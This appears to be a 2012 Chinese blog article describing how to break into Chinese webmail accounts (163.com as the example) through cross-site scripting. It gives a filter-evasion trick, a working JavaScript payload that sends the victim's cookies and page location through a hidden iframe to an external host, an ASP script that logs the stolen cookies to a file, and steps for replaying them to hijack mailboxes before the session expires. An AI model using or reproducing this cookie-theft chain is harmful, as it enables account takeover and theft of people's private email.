现在的位置: 首页 > 综合 > 正文

国内所有Mail安全漏洞

2012年06月01日 ⁄ 综合 ⁄ 共 1706字 ⁄ 字号 评论关闭
先简单说下跨站脚本漏洞,又称为XSS攻击,也称为Html代码注入漏洞,可以知道漏洞的起因是注入了Html代码,危害就是最终在别人浏览器内以浏览者的身份执行任意Html代码。
国内邮箱在跨站脚本攻击防御方面存在漏洞,可以被人引入script脚本,然后通过窃取cookie的手段来进入他人邮箱获得敏感内容。各个邮箱存在的问题可能不同,但是方法是一样的,现在就以163.com的邮箱作为例子。
163.com存在的问题在于对于script关键字过滤不正确,譬如<img src=javascript:alert()>这样的代码在163中可能因为存在javascript而被转换,但是如果我们用jav  ascrip  t:alert()代码却可以躲避检查,但是后面的代码依然会执行。问题存在了,剩下的只是利用问题。
现在的服务器对浏览器的身份已经不是简单的Cookie了,一般采用的是session认证的方法。session是保存在服务器方面的,我们不能随意更改,但是我们可以劫持或者冒充,因为浏览器是通过提交一个sessionID之类的东西去服务器验证自己的身份的。譬如我们嗅叹或者其他的技术手段获得了一个管理员或者我们需要的用户的sessionID,就可以想办法自己取得这个sessionID去冒充他了。其实在跨站脚本当中,sessionID等内容也是保存在cookie里的,如果我们偷到了Cookie也就取得了sessionID哦!
首先偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为:

var code;         
var target = "http://www.loveshell.net/cookie.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;         
code=code+" width=0 height=0></iframe>";
document.write(code);

这样就可以将cookie等信息传到我们的站点了!cookie.asp内容为:

dim fso,file,str        
str=unescape(request.Servervariables("QUERY_STRING"))    
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject") 
path = server.mappath("loveshell.txt")     
set file=fso.opentextfile(path, ForAppending, TRUE)   
file.write("Xss:")
file.write(str)        
file.write vbCrLf       
file.close
set file = nothing        
set fso = nothing

这样就可以将得到的Cookie保存了,因为在研究163的登陆机制之后需要当前登陆的服务器名,而这些在location里有所体现,主页面也可以通过cookie推算出来,最后就是劫持这个Cookie了。随便找个能修改cookie的工具,譬如老兵的webtool就可以了,注意的是Url的构造,经过测试是可以成功登陆的,当然需要Cookie是不失效的,要求用户不要退出和时间不超过20分钟左右,这就需要cookie的有效性,如何实现这个呢?
用过手机注册人知道,只要提交一个参数就会把一条信息发送到你的手机上,为了确保时效性我们可以利用这个,做法就是修改Cookie.asp,一旦发现有某个特定信息提交就会向你的手机发消息,然后我们可以迅速的在session失效之前进入邮箱

抱歉!评论已关闭.